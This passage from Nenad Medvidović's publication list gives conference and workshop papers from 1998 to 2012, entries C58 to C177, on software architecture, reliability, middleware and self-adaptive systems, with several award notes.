**C58** Isela Macia Bertrán, Joshua Garcia, Daniel Popescu, Alessandro Garcia, **Nenad Medvidović**, and Arndt Von Staa. Are Automatically-Detected Code Anomalies Relevant to Architectural Modularity? An Exploratory Analysis of Evolving Systems. In Proceedings of the 11th International Conference on Aspect-Oriented Software Development, Potsdam, Germany, March 2012.

**C59** Jae young Bang, Daniel Popescu, and **Nenad Medvidović**. Enabling Workspace Awareness for Collaborative Software Modeling. In Proceedings of the Future of Collaborative Software Development Workshop, Seattle, WA, February 2012.

**C60** George Edwards, Yuriy Brun, and **Nenad Medvidović**. Isomorphism in Model Tools and Editors. In Proceedings of the 26th IEEE/ACM International Conference on Automated Software Engineering (ASE 2011), Lawrence, KS, November 2011.

**C61** Joshua Garcia, Daniel Popescu, Chris A. Mattmann, **Nenad Medvidović**, and Yuanfang Cai. Enhancing Architectural Recovery Using Concerns. In Proceedings of the 26th IEEE/ACM International Conference on Automated Software Engineering (ASE 2011), Lawrence, KS, November 2011.

**C62** Isela Macia Bertrán, Alessandro Garcia, Arndt von Staa, Joshua Garcia, and **Nenad Medvidović**. On the Impact of Aspect-Oriented Code Smells on Architecture Modularity: An Exploratory Study. In Proceedings of the 5th Brazilian Symposium on Software Components, Architectures, and Reuse (SBCARS 2011), Sao Paulo, Brazil, September 2011.

**C63** Yuriy Brun, George Edwards, Jae young Bang, and **Nenad Medvidović**. Smart Redundancy for Distributed Computation. In Proceedings of the 31st International Conference on Distributed Computing Systems (ICDCS), Minneapolis, MN, June 2011.

**C64** Hossein Tajalli, Joshua Garcia, George Edwards, and **Nenad Medvidović**. PLASMA: A Plan-based Layered Architecture for Software Model-driven Adaptation. In Proceedings of the 25th IEEE/ACM International Conference on Automated Software Engineering (ASE 2010), Antwerp, Belgium, September 2010.

**C65** David Woollard, Chris A. Mattmann, Daniel Popescu, and **Nenad Medvidović**. KADRE: Domain-Specific Architectural Recovery for Scientific Software Systems. In Proceedings of the 25th IEEE/ACM International Conference on Automated Software Engineering (ASE 2010), Antwerp, Belgium, September 2010.

**C66** Jae young Bang, Daniel Popescu, George Edwards, **Nenad Medvidović**, Naveen Kulkarni, Girish M. Rama, and Srinivas Padmanabhuni. CoDesign - A Highly Extensible Collaborative Software Modeling Framework. In Proceedings of the 32nd International Conference on Software Engineering (ICSE 2010), Formal Demonstration Track, Cape Town, South Africa, May 2010.

**C67** Ivo Krka, Yuriy Brun, Daniel Popescu, Joshua Garcia, and **Nenad Medvidović**. Using Dynamic Execution Traces and Program Invariants to Enhance Behavioral Model Inference. In Proceedings of the 32nd International Conference on Software Engineering (ICSE 2010), New Ideas and Emerging Results, Cape Town, South Africa, May 2010.

**C68** Ivo Krka, Leana Golubchik, and **Nenad Medvidović**. Probabilistic Automata for Architecture-Based Reliability Assessment. In Proceedings of the Workshop on Quantitative Stochastic Models in the Verification and Design of Software Systems (QUOVADIS), Cape Town, South Africa, May 2010.

**C69** Leslie Cheung, Leana Golubchik, and **Nenad Medvidović**. SHARP: A Scalable Approach to Architecture-Level Reliability Prediction of Concurrent Systems. In Proceedings of the Workshop on Quantitative Stochastic Models in the Verification and Design of Software Systems (QUOVADIS), Cape Town, South Africa, May 2010.

**C70** T. S. Mohan, **Nenad Medvidović**, and Chris A. Mattmann. Leveraging Domain-Specific Software Architectures for Classifying Cloud Service Abstractions. In Proceedings of the Cloud Futures 2010 Workshop, Redmond, WA, April 2010.

**C71** Susan Ferreira, Ricardo Valerdi, **Nenad Medvidović**, John Hess, Indira Deonandan, Tsoline Mikaelian, Tom Tenorio, Filiberto Macias, and Gayle Shull. Unmanned and Autonomous Systems of Systems Test and Evaluation: Challenges and Opportunities. In Proceedings of the 2010 IEEE International Systems Conference (SysCon), San Diego, CA, April 2010.

**C72** Chris Mattmann, Joshua Garcia, Ivo Krka, Daniel Popescu, and **Nenad Medvidović**. The Anatomy and Physiology of the Grid Revisited. In Proceedings of the Joint 8th Working IEEE/IFIP Conference on Software Architecture (WICSA-8) and the 3rd European Conference on Software Architecture (ECSA-3), Cambridge, UK, September 2009.

Richard N. Taylor, **Nenad Medvidović**, and Peyman Oreizy. Architectural Styles for Runtime Software Adaptation In Proceedings of the Joint 8th Working IEEE/IFIP Conference on Software Architecture (WICSA-8) and the 3rd European Conference on Software Architecture (ECSA-3), Cambridge, UK, September 2009.

**C73** Ivo Krka, Yuriy Brun, George Edwards, and **Nenad Medvidović**. Synthesizing Partial Component-Level Behavior Models from System Specifications. In Proceedings of the 7th Joint Meeting of the European Software Engineering Conference and ACM SIGSOFT Symposium on the Foundations of Software Engineering (ESEC/FSE09), Amsterdam, the Netherlands, August 2009.

**C74** Chiyoung Seo, George Edwards, Daniel Popescu, Sam Malek, and **Nenad Medvidović**. A Framework for Estimating the Energy Consumption Induced by a Distributed System's Architectural Style. In Proceedings of the 8th Workshop on Specification and Verification of Component-Based Systems (SAVCBS), Amsterdam, the Netherlands, August 2009.

**C75** Joshua Garcia, Daniel Popescu, George Edwards, and **Nenad Medvidović**. Toward a Catalogue of Architectural Bad Smells. In Proceedings of the 5th International Conference on the Quality of Software Architectures (QoSA), East Stroudsburg, PA, June 2009.

**C76** Donna Spruijt-Metz, Ming Li, Gautam Thatte, Gaurav Sukhatme, Murali Annavaram, Sabyasachi Ghosh, Viktor Rozgic, Urbashi Mitra, **Nenad Medvidović**, Britni Belcher, and Shrikanth Narayanan. Differentiating Physical Activity Modalities in Youth Using Heartbeat Waveform Shape and Differences between Adjacent Waveforms. In Proceedings of the 7th International Conference on Diet and Activity Methods (ICDAM 7), Washington, DC, June 2009.

**C77** Yuriy Brun and **Nenad Medvidović**. Crystal-Growth-Inspired Algorithms for Computational Grids. In Proceedings of the Workshop on Bio-Inspired Algorithms for Distributed Systems (BADS09), Barcelona, Spain, June 2009.

**C78** Ivo Krka, George Edwards, Yuriy Brun, and **Nenad Medvidović**. From System Specifications to Component Behavioral Models. In Proceedings of the 31st International Conference on Software Engineering (ICSE 2009), New Ideas and Emerging Results Track, Vancouver, Canada, May 2009.

**C79** Daniel Popescu, Joshua Garcia, and **Nenad Medvidović**. Enabling More Precise Dependency Analysis in Event-Based Systems. In Proceedings of the 17th International Conference on Program Comprehension (ICPC 2009), Vancouver, Canada, May 2009.

Winner of the ICPC 2009 Best Poster Award

**C80** George Edwards, Joshua Garcia, Hossein Tajalli, Daniel Popescu, **Nenad Medvidović**, Gaurav Sukhatme, and Brad Petrus. Architecture-Driven Self-Adaptation and Self-Management in Robotics Systems. In Proceedings of the 2009 ACM/IEEE International Workshop on Software Engineering for Adaptive and Self-Managing Systems (SEAMS), Vancouver, Canada, May 2009.

**C81** David Woollard, Chris Mattmann, and **Nenad Medvidović**. Injecting Software Architectural Constraints into Legacy Scientific Applications. In Proceedings of the ICSE 2009 Workshop on Software Engineering for Computational Science and Engineering, Vancouver, Canada, May 23, 2009.

**C82** Joshua Garcia, Daniel Popescu, George Edwards and **Nenad Medvidović**. Identifying Architectural Bad Smells. In Proceedings of the 13th European Conference on Software Maintenance and Reengineering (CSMR 2009), Kaiserslautern, Germany, March 2009.

**C83** Murali Annavaram, **Nenad Medvidović**, Urbashi Mitra, Shrikanth Narayanan, Donna Spruijt-Metz, Gaurav Sukhatme, Zhaoshi Meng, Shi Qiu, Rohit Kumar, and Gautam Thatte. Multimodal Sensing for Pediatric Obesity Applications. In Proceedings of the International Workshop on Urban, Community, and Social Applications of Networked Sensing Systems (UrbanSense08), Raleigh, NC, November 4, 2008.

**C84** Chiyoung Seo, Sam Malek, and **Nenad Medvidović**. Component-Level Energy Consumption Estimation for Distributed Java-Based Software Systems. In Proceedings of the 11th International Symposium on Component Based Software Engineering (CBSE 2008), Karlsruhe, Germany, October 2008.

**C85** George Edwards and **Nenad Medvidović**. A Methodology and Framework for Creating Domain-Specific Development Infrastructures. In Proceedings of the 23rd IEEE/ACM International Conference on Automated Software Engineering (ASE 2008), L'Aquila, Italy, September 2008.

**C86** Daniel Popescu and **Nenad Medvidović**. Ensuring Architectural Conformance in Message- Based Systems. In Proceedings of the DSN 2008 Workshop on Architecting Dependable Systems (WADS 2008), Anchorage, AK, USA, June 2008.

**C87** Ivo Krka, Leslie Cheung, George Edwards, Leana Golubchik, and **Nenad Medvidović**. Architecture-Based Software Reliability Estimation: Problem Space, Challenges, and Strategies. In Proceedings of the DSN 2008 Workshop on Architecting Dependable Systems (WADS 2008), Anchorage, AK, USA, June 2008.

**C88** Leslie Cheung, Roshanak Roshandel, **Nenad Medvidović**, and Leana Golubchik. Early Prediction of Software Component Reliability. In Proceedings of the 30th International Conference on Software Engineering (ICSE 2008), Leipzig, Germany, May 2008.

**C89** Marija Mikic-Rakic, Sam Malek, and **Nenad Medvidović**. Architecture-Driven Software Mobility in Support of QoS Requirements. In Proceedings of the International Workshop on Software Architectures and Mobility (SAM 2008), Leipzig, Germany, May 2008.

**C90** Chris Mattmann, David Woollard, and **Nenad Medvidović**. Exploiting Connector Knowledge To Efficiently Disseminate Highly Voluminous Data Sets. In Proceedings of the 3rdWorkshop on SHAring and Reusing architectural Knowledge (SHARK 2008), Leipzig, Germany, May 2008.

**C91** Chiyoung Seo, Sam Malek, and **Nenad Medvidović**. Estimating the Energy Consumption in Pervasive Java-Based Systems. In Proceedings of the 6th IEEE International Conference on Pervasive Computing and Communications, Hong Kong, March 2008.

**C92** Chiyoung Seo, George Edwards, Sam Malek, and **Nenad Medvidović**. A Framework for Estimating the Impact of a Distributed Software System's Architectural Style on its Energy Consumption. In Proceedings of the 7th Working IEEE/IFIP Conference on Software Architecture (WICSA 2008), Vancouver, BC, Canada, February 2008.

**C93** George Edwards, Chiyoung Seo, Daniel Popescu, Sam Malek, and **Nenad Medvidović**. Self-* Software Architectures and Component Middleware in Pervasive Environments. In Proceedings of the 5th International Workshop on Middleware for Pervasive and Ad-Hoc Computing (MPAC 2007), Newport Beach, CA, November 2007.

**C94** Chiyoung Seo, Sam Malek, and **Nenad Medvidović**. An Energy Consumption Framework for Distributed Java-Based Systems. In Proceedings of the 22nd International Conference on Automated Software Engineering (ASE 2007), Atlanta, GA, November 2007.

**C95** Daniel Popescu, Spencer Rugaber, **Nenad Medvidović**, and Daniel M. Berry. Improving the Quality of Requirements Specifications via Automatically Created Object-Oriented Models. In Proceeding of the 14th Monterey Workshop on Requirements Analysis, Monterey, CA, September 2007.

**C96** Yuriy Brun and **Nenad Medvidović**. Fault and Adversary Tolerance as an Emergent Property of Distributed Systems' Software Architectures. In Proceedings of the 2nd International Workshop on Engineering Fault Tolerant Systems (EFTS 2007), Dubrovnik, Croatia, September 2007.

**C97** **Nenad Medvidović** and Sam Malek. Software Deployment Architecture and Quality-of-Service in Pervasive Environments. In Proceedings of the International Workshop on the Engineering of Software Services for Pervasive Environments (ESSPE 2007), Dubrovnik, Croatia, September 2007.

**C98** George Edwards, Chiyoung Seo, and **Nenad Medvidović**. Construction of Analytic Frameworks for Component-Based Architectures. In Proceedings of the Brazilian Symposium on Software Components, Architectures, and Reuse (SBCARS 2007), Campinas, Brazil, August 2007.

**C99** Vito Perrone, Chris A. Mattmann, Sean Kelly, Daniel J. Crichton, Anthony Finkelstein, and **Nenad Medvidović**. A Reference Framework for Requirements and Architecture in Biomedical Grid Systems. In Proceedings of the IEEE International Conference on Information Reuse and Integration (IEEE IRI-2007), Las Vegas, NV, August 2007.

**C100** Roshanak Roshandel, **Nenad Medvidović**, and Leana Golubchik. A Bayesian Model for Predicting Reliability of Software Systems at the Architectural Level. In Proceedings of the 3rd International Conference on Quality of Software Architectures (QoSA 2007), Boston, MA, July 2007.

**C101** Roshanak Roshandel and **Nenad Medvidović**. A Classification of Architectural Reliability Models. In Proceedings of the International Workshop on Software Architecture Research and Practice, Silicon Valley, CA, July 2007.

**C102** Yuriy Brun and **Nenad Medvidović**. An Architectural Style for Solving Computationally Intensive Problems on Large Networks. In Proceedings of the 2nd Workshop on Software Engineering for Adaptive and Self-Managing Systems (SEAMS 2007), Minneapolis, MN, May 2007.

Winner of the SEAMS 2007 Most Influential Paper Award, awarded at SEAMS 2020

**C103** Sam Malek, Chiyoung Seo, Sharmila Ravula, Brad Petrus, and **Nenad Medvidović**. Reconceptualizing a Family of Heterogeneous Embedded Systems via Explicit Architectural Support. In Proceedings of the 29th International Conference on Software Engineering (ICSE 2007), Minneapolis, MN, May 2007.

**C104** Chiyoung Seo, Sam Malek, George Edwards, Daniel Popescu, **Nenad Medvidović**, Brad Petrus, and Sharmila Ravula. Exploring the Role of Software Architecture in Dynamic and Fault-Tolerant Pervasive Systems. In Proceedings of the Workshop on Software Engineering of Pervasive Computing Applications, Systems, and Environments (SEPCASE 2007), Minneapolis, MN, May 2007.

**C105** Chris A. Mattmann, David Woollard, **Nenad Medvidović**, and Reza Mahjourian. Software Connector Classification and Selection for Data-intensive Systems. In Proceedings of the 2nd Workshop on Incorporating COTS Software into Software Systems: Tools and Techniques (IWICSS 2007), Minneapolis, MN, May 2007.

**C106** George Edwards, Sam Malek, and **Nenad Medvidović**. Scenario-Driven Dynamic Analysis of Distributed Architecture. In Proceedings of the 10th International Conference on Fundamental Approaches to Software Engineering (FASE 2007), Braga, Portugal, March- April 2007.

**C107** Chris A. Mattmann and **Nenad Medvidović**. The GridLite DREAM: Bringing the Grid to Your Pocket. In Proceedings of the 12th Monterey Workshop, LNCS 4322, Springer Verlag, February 2007.

**C108** Jesal Bhuta, Chris A. Mattmann, **Nenad Medvidović**, and Barry Boehm. A Framework for the Assessment and Selection of Software Components and Connectors in COTS-based Architectures. In Proceedings of the 2007 IEEE/IFIP Working Conference on Software Architecture (WICSA-6), Mumbai, India, January 2007.

**C109** Sam Malek, Chiyoung Seo, Sharmila Ravula, Brad Petrus, and **Nenad Medvidović**. Providing Middleware-Level Facilities to Support Architecture-Based Development of Software Systems in Pervasive Environments. In Proceedings of the 4th International Workshop on Middleware for Pervasive and Ad-Hoc Computing (MPAC 2006), Melbourne, Australia, November 27 - December 2006.

**C110** Sam Malek, Chiyoung Seo, and **Nenad Medvidović**. Tailoring an Architectural Middleware Platform to a Heterogeneous Embedded Environment. In Proceedings of the 6th International Workshop on Software Engineering and Middleware (SEM 2006), Portland, Oregon, November 2006.

**C111** Marija Mikic-Rakic and **Nenad Medvidović**. A Classification of Disconnected Operation Techniques. In Proceedings of the 32nd EUROMICRO Conference on Software Engineering and Advanced Applications (EUROMICRO’06), Dubrovnik, Croatia, August 29 - September 2006.

**C112** Chris A. Mattmann, Daniel J. Crichton, **Nenad Medvidović**, and Steven Hughes. A Software Architecture-Based Framework for Highly Distributed and Data Intensive Scientific Applications. In Proceedings of the 28th International Conference on Software Engineering (ICSE 2006), Shanghai, China, May 2006.

**C113** Roshanak Roshandel, Somo Banerjee, Leslie Cheung, **Nenad Medvidović**, and Leana Golubchik. Estimating Software Component Reliability by Leveraging Architectural Models. In Proceedings of the 28th International Conference on Software Engineering (ICSE 2006), Shanghai, China, May 2006.

**C114** David Woollard and **Nenad Medvidović**. An Architectural Style for High-Performance Asymmetrical Parallel Computations. In Proceedings of the 28th International Conference on Software Engineering (ICSE 2006), Shanghai, China, May 2006.

**C115** Sam Malek, Marija Mikic-Rakic, and **Nenad Medvidović**. A Decentralized Redeployment Algorithm for Improving the Availability of Distributed Systems. In Proceedings of the 3rd International Working Conference on Component Deployment (CD 2005), Grenoble, France, November 2005.

**C116** Marija Mikic-Rakic, Sam Malek, and **Nenad Medvidović**. Improving Availability in Large, Distributed Component-Based Systems via Redeployment. In Proceedings of the 3rd International Working Conference on Component Deployment (CD 2005), Grenoble, France, November 2005.

**C117** Somo Banerjee, Chris A. Mattmann, **Nenad Medvidović**, and Leana Golubchik. Leveraging Architectural Models to Inject Trust into Software Systems. In Proceedings of the ICSE 2005 Workshop on Software Engineering for Secure Systems - Building Trustworthy Applications (SESS'05), St. Louis, MO, May 2005.

**C118** Omer Erdem Demir, Prem Devanbu, **Nenad Medvidović**, and Eric Wohlstadter. DISCOA: Architectural Adaptations for Security and QoS. In Proceedings of the ICSE 2005 Workshop on Software Engineering for Secure Systems - Building Trustworthy Applications (SESS'05), St. Louis, MO, May 2005.

**C119** Vladimir Jakobac, **Nenad Medvidović**, and Alexander Egyed. Separating Architectural Concerns to Ease Program Understanding. In Proceedings of the ICSE 2005 Workshop on the Modeling and Analysis of Concerns in Software (MACS), St. Louis, MO, May 2005.

**C120** Chris A. Mattmann, **Nenad Medvidović**, Paul M. Ramirez, and Vladimir Jakobac. Unlocking the Grid. In Proceedings of the 8th International Symposium on Component Based Software Engineering (CBSE-8), St. Louis, MO, May 2005.

**C121** David Woollard, **Nenad Medvidović**, Walter Yamada, and Theodore Berger. ADaPT: An Event-Passing Protocol for Reducing Delivery Costs in Scatter-Gather Parallel Processes. In Proceedings of the Workshop for Patterns in High Performance Computing, Urbana, IL, May 2005.

**C122** Vladimir Jakobac, Alexander Egyed, and **Nenad Medvidović**. Improving System Understanding via Interactive, Tailorable, Source Code Analysis. In Proceedings of the 2005 Conference on Fundamental Approaches to Software Engineering (FASE 2005), Edinburgh, UK, April 2005.

**C123** Chris A. Mattmann, Sam Malek, Nels Beckman, Marija Mikic-Rakic, **Nenad Medvidović**, and Daniel J. Crichton. GLIDE: A Grid-based Light-weight Infrastructure for Data-intensive Environments. In Proceedings of the 2005 European Grid Conference (EGC 2005), Amsterdam, the Netherlands, February 2005.

**C124** Sam Malek, Marija Mikic-Rakic, **Nenad Medvidović**. An Extensible Framework for Autonomic Analysis and Improvement of Distributed Deployment Architectures. In Proceedings of the ACM SIGSOFT Workshop on Self-Managed Systems (WOSS 2004), Newport Beach, CA, October 31 - November 2004.

**C125** Nikunj Mehta, **Nenad Medvidović**, Marjan Sirjani, and Farhad Arbab. Modeling Behavior in Compositions of Software Architectural Primitives. In Proceedings of the 19th IEEE International Conference on Automated Software Engineering (ASE 2004), Linz, Austria, September 2004.

**C126** Barry Boehm, Jesal Bhuta, David Garlan, Eric Gradman, LiGuo Huang, Alexander Lam, Ray Madachy, **Nenad Medvidović**, Kenneth Meyer, Steven Meyers, Gustavo Perez, Kirk Reinholtz, Roshanak Roshandel, and Nicolas Rouquette. Using Testbeds to Accelerate Technology Maturity and Transition: The SCRover Experience. In Proceedings of the ACM-IEEE 2004 International Symposium on Empirical Software Engineering (ISESE 2004), Redondo Beach, CA, August 2004.

**C127** Roshanak Roshandel, Bradley Schmerl, **Nenad Medvidović**, David Garlan, and Dehua Zhang. Understanding Tradeoffs among Different Architectural Modeling Approaches. In Proceedings of the 4th Working IEEE/IFIP Conference on Software Architecture (WICSA-4), Oslo, Norway, June 2004.

**C128** Roshanak Roshandel and **Nenad Medvidović**. Toward Architecture-Based Reliability Estimation. In Proceedings of Twin Workshops on Architecting Dependable Systems (WADS 2004), Edinburgh, UK, May 25, 2004 and Florence, Italy, June 2004.

**C129** Marija Mikic-Rakic, Sam Malek, Nels Beckman, and **Nenad Medvidović**. Improving Availability of Distributed Event-Based Systems via Run-Time Monitoring and Analysis. In Proceedings of Twin Workshops on Architecting Dependable Systems (WADS 2004), Edinburgh, UK, May 25, 2004 and Florence, Italy, June 2004.

**C130** Nikunj Mehta, Ramakrishna Soma, and **Nenad Medvidović**. Style-Based Software Architectural Compositions as Domain-Specific Models. In Proceedings of the Workshop on Directions in Software Engineering Environments (WoDiSEE 2004), Edinburgh, UK, May 2004.

**C131** Marija Mikic-Rakic, Sam Malek, Nels Beckman, and **Nenad Medvidović**. A Tailorable Environment for Assessing the Quality of Deployment Architectures in Highly Distributed Settings. In Proceedings of the 2nd International Working Conference on Component Deployment (CD 2004), Edinburgh, UK, May 2004.

**C132** Marija Mikic-Rakic and **Nenad Medvidović**. Software Architectural Support for Disconnected Operation in Highly Distributed Environments. In Proceedings of the 7th International Symposium on Component Based Software Engineering (CBSE-7), Edinburgh, UK, May 2004.

**C133** Marija Mikic-Rakic and **Nenad Medvidović**. Support for Disconnected Operation via Architectural Self-Reconfiguration. In Proceedings of the First International Conference on Autonomic Computing (ICAC-04), New York, NY, May 2004.

**C134** **Nenad Medvidović**, Sam Malek, and Marija Mikic-Rakic. Software Architectures and Embedded Systems. In Proceedings of the Monterey Workshop on Software Engineering for Embedded Systems (SEES 2003), Chicago, IL, September 2003.

**C135** Andre van der Hoek, Ebru Dincel, and **Nenad Medvidović**. Using Service Utilization Metrics to Assess the Structure of Product Line Architectures. In Proceedings of the 9th International Software Metrics Symposium, Sydney, Australia, September 2003.

**C136** Nikunj R. Mehta and **Nenad Medvidović**. Composing Architectural Styles from Architectural Primitives. In Proceedings of the Joint 9th European Software Engineering Conference and 11th ACM Symposium on the Foundations of Software Engineering (ESEC/ FSE 2003), Helsinki, Finland, September 2003.

**C137** Roshanak Roshandel and **Nenad Medvidović**. Modeling Multiple Aspects of Software Components. In Proceedings of the Workshop on Specification and Verification of Component-Based Systems, Helsinki, Finland, September 2003.

**C138** Marija Mikic-Rakic and **Nenad Medvidović**. Adaptable Architectural Middleware for Programming-in-the-Small-and-Many. In Proceedings of the ACM/IFIP/USENIX International Middleware Conference (Middleware'03), Rio de Janeiro, Brazil, June 2003.

**C139** Marija Mikic-Rakic and **Nenad Medvidović**. A Connector-Aware Middleware for Distributed Deployment and Mobility. In Proceedings of the First International Workshop on Mobile Computing Middleware, Providence, RI, May 2003.

**C140** **Nenad Medvidović**, Alexander Egyed, and Paul Gruenbacher. Stemming Architectural Erosion by Coupling Architectural Discovery and Recovery. In Proceedings of the Second International Software Requirements to Architectures Workshop, Portland, OR, May 2003.

**C141** Marija Mikic-Rakic and **Nenad Medvidović**. Toward a Framework for Classifying Disconnected Operation Techniques. In Proceedings of the Second International Workshop on Software Architectures for Dependable Systems, Portland, OR, May 2003.

**C142** Nikunj Mehta and **Nenad Medvidović**. Understanding Software Connector Compatibilities Using A Connector Taxonomy. In Proceedings of the First Workshop on Software Design and Architecture (SoDA'02), Bangalore, India, December 2002.

**C143** Marija Mikic-Rakic, Nikunj Mehta, and **Nenad Medvidović**. Architectural Style Requirements for Self-Healing Systems. In Proceedings of the First International Workshop on Self-Healing Systems (WOSS'02), Charleston, SC, November 2002.

**C144** **Nenad Medvidović**, Nikunj Mehta, and Marija Mikic-Rakic. A Family of Software Architecture Implementation Frameworks. In Proceedings of the 2002 Working IEEE/IFIP Conference on Software Architectures (WICSA-3), Montreal, Canada, August 2002.

**C145** **Nenad Medvidović**. On the Role of Middleware in Architecture-Based Software Development. In Proceedings of the 14th International Conference on Software Engineering and Knowledge Engineering (SEKE), Ischia, Italy, July 2002.

Fast-tracked for journal publication as one of the best papers of the conference.

**C146** Marija Mikic-Rakic and **Nenad Medvidović**. Architecture-Level Support for Software Component Deployment in Resource Constrained Environments. In Proceedings of the IFIP/ACM Working Conference on Component Deployment, Berlin, Germany, June 2002.

**C147** **Nenad Medvidović** and Marija Mikic-Rakic. Programming-in-the-Many: A Software Engineering Paradigm for the 21st Century. In Proceedings of the Workshop on New Visions for Software Design and Productivity. Nashville, TN, December 2001.

**C148** Roshanak Roshandel and **Nenad Medvidović**. Coupling Static and Dynamic Semantics in an Architecture Description Language. In Proceedings of the Working Conference on Complex and Dynamic Systems Architecture (CDSA), Brisbane, Australia, December 2001.

**C149** Ebru Dincel, **Nenad Medvidović**, and Andre van der Hoek. Measuring Product Line Architectures. In Proceedings of the 4th International Workshop on Product Family Engineering (PFE-4), pages 346-352, Bilbao, Spain, October 2001.

**C150** Andre van der Hoek, Marija Mikic-Rakic, Roshanak Roshandel, and **Nenad Medvidović**. Taming Architectural Evolution. In Proceedings on the Joint 8th European Software Engineering Conference and 9th ACM SIGSOFT Symposium on the Foundations of Software Engineering (ESEC/FSE 2001), Vienna, Austria, September 2001.

Fast-tracked for journal publication as one of the best papers of the conference.

**C151** Paul Gruenbacher, Alexander Egyed, and **Nenad Medvidović**. Reconciling Software Requirements and Architectures: The CBSP Approach. In Proceedings of the 5th IEEE International Symposium on Requirements Engineering (RE'01), Toronto, Canada, August 2001.

**C152** Lei Ding and **Nenad Medvidović**. Focus: A Light-Weight, Incremental Approach to Software Architecture Recovery and Evolution. In Proceedings of the 2001 Working IEEE/ IFIP Conference on Software Architectures (WICSA-2), Amsterdam, the Netherlands, August 2001.

**C153** **Nenad Medvidović**, Paul Gruenbacher, Alexander Egyed, and Barry W. Boehm. Software Model Connectors: Bridging Models across the Software Lifecycle. In Proceedings of the 13th International Conference on Software Engineering and Knowledge Engineering (SEKE 2001), Buenos Aires, Argentina, June 2001.

Fast-tracked for journal publication as one of the best papers of the conference.

**C154** Marija Rakic and **Nenad Medvidović**. Increasing the Confidence in Off-the-Shelf Components: A Software Connector-Based Approach. In Proceedings of the 2001 Symposium on Software Reusability (SSR 2001), Toronto, Canada, May 2001.

**C155** Alexander Egyed and **Nenad Medvidović**. Consistent Architectural Refinement and Evolution Using the Unified Modeling Language. In Proceedings of the Workshop on Describing Software Architecture with UML, Toronto, Canada, May 2001.

**C156** Alexander Egyed, Paul Gruenbacher, and **Nenad Medvidović**. Refinement and Evolution Issues in Bridging Requirements and Architecture - The CBSP Approach. In Proceedings of the First International Software Requirements to Architectures Workshop (STRAW 2001), Toronto, Canada, May 2001.

**C157** Marija Rakic and **Nenad Medvidović**. Runtime Support for Architecture-Level Configuration Management. In Proceedings of the Tenth International Workshop on Software Configuration Management (SCM-10), Toronto, Canada, May 2001.

**C158** **Nenad Medvidović** and Marija Rakic. Exploiting Software Architecture Implementation Infrastructure in Facilitating Component Mobility. In Proceedings of the Workshop on Software Engineering and Mobility, Toronto, Canada, May 2001.

**C159** Nicolas Rouquette, **Nenad Medvidović**, and David Garlan. Dependable Autonomous Systems = knowing well what to do + knowing how to do it well. In Proceedings of the NASA High Dependability Computing Consortium Workshop, NASA AMES, Moffet Field, CA, January 2001.

**C160** Rohit Khare, Michael Guntersdorfer, Peyman Oreizy, **Nenad Medvidović**, Richard N. Taylor. xADL: Enabling Architecture-Centric Tool Integration With XML. In Proceedings of the 34th Hawaii International Conference on System Sciences (HICSS-34), Maui, Hawaii, January 2001.

**C161** Nikunj R. Mehta, **Nenad Medvidović**, and Sandeep Phadke. Towards a Taxonomy of Software Connectors. In Proceedings of the 22nd International Conference on Software Engineering (ICSE 2000), Limerick, Ireland, June 2000.

**C162** Paul Gruenbacher, Alexander Egyed, and **Nenad Medvidović**. Dimensions of Concerns in Requirements Negotiation and Architecture Modeling. In Proceedings of the Workshop on Multi-Dimensional Separation of Concerns in Software Engineering, Limerick, Ireland, June 2000.

**C163** **Nenad Medvidović**, Rose F. Gamble, and David S. Rosenblum. Towards Software Multioperability: Bridging Heterogeneous Software Interoperability Platforms. In Proceedings of the Fourth International Software Architecture Workshop (ISAW-4), Limerick, Ireland, June 2000.

**C164** Alexander Egyed and **Nenad Medvidović**. A Formal Approach to Heterogeneous Software Modeling. In Proceedings of the 2000 Conference on the Fundamental Approaches to Software Engineering (FASE 2000), Berlin, Germany, March-April 2000.

**C165** Alexander Egyed, Nikunj R. Mehta, and **Nenad Medvidović**. Software Connectors and Refinement in Family Architectures. In Proceedings of the Third International Workshop on Software Architectures for Product Families (IW-SAPF3), Las Palmas de Gran Canaria, Spain, March 2000.

**C166** Alexander Egyed and **Nenad Medvidović**. Extending Architectural Representation in UML with View Integration. In Proceedings of the 2nd International Conference on The Unified Modeling Language (UML'99), Fort Collins, CO, October 1999.

**C167** Marwan Abi-Antoun and **Nenad Medvidović**. Enabling the Refinement of a Software Architecture into a Design. In Proceedings of the 2nd International Conference on The Unified Modeling Language (UML'99), Fort Collins, CO, October 1999.

**C168** **Nenad Medvidović**, Alexander Egyed, and David S. Rosenblum. Round-Trip Software Engineering Using UML: From Architecture to Design and Back. In Proceedings of the Second International Workshop on Object-Oriented Reengineering (WOOR'99), Toulouse, France, September 1999.

**C169** Eric M. Dashofy, **Nenad Medvidović**, and Richard N. Taylor. Using Off-the-Shelf Middleware to Implement Connectors in Distributed Software Architectures. In Proceedings of the 21st International Conference on Software Engineering (ICSE'99), Los Angeles, CA, May 1999.

**C170** **Nenad Medvidović**, David S. Rosenblum, and Richard N. Taylor. A Language and Environment for Architecture-Based Software Development and Evolution. In Proceedings of the 21st International Conference on Software Engineering (ICSE'99), Los Angeles, CA, May 1999.

Finalist for the ICSE'99 Most Influential Paper Award

**C171** **Nenad Medvidović** and David S. Rosenblum. Assessing the Suitability of a Standard Design Method for Modeling Software Architectures. In Proceedings of the First Working IFIP Conference on Software Architecture (WICSA-1), San Antonio, TX, February 1999.

**C172** **Nenad Medvidović** and Richard N. Taylor. Separating Fact from Fiction in Software Architecture. In Proceedings of the Third International Software Architecture Workshop (ISAW-3), Orlando, FL, November 1998.

**C173** **Nenad Medvidović**, Eric M. Dashofy, and Richard N. Taylor. Employing Off-the-Shelf Connector Technologies in C2-Style Architectures. In Proceedings of the California Software Symposium (CSS'98), Irvine, CA, October 1998.

**C174** Jason E. Robbins, **Nenad Medvidović**, David F. Redmiles, and David S. Rosenblum. Integrating Architecture Description Languages with a Standard Design Method. In Proceedings of the 20th International Conference on Software Engineering (ICSE'98), Kyoto, Japan, April 1998.

**C175** Peyman Oreizy, **Nenad Medvidović**, and Richard N. Taylor. Architecture-Based Runtime Software Evolution. In Proceedings of the 20th International Conference on Software Engineering (ICSE'98), Kyoto, Japan, April 1998.

Winner of the ICSE'98 Most Influential Paper Award, awarded at ICSE 2008

**C176** **Nenad Medvidović**, Richard N. Taylor, and David S. Rosenblum. An Architecture-Based Approach to Software Evolution. In Proceedings of the International Workshop on the Principles of Software Evolution (IWPSE-1), Kyoto, Japan, 1998.

**C177** Peyman Oreizy, **Nenad Medvidović**, Richard N. Taylor, and David S. Rosenblum. Software Architecture and Component Technologies: Bridging the Gap. In Proceedings of the Workshop on Compositional Software Architectures, Monterey, CA, January 1998.

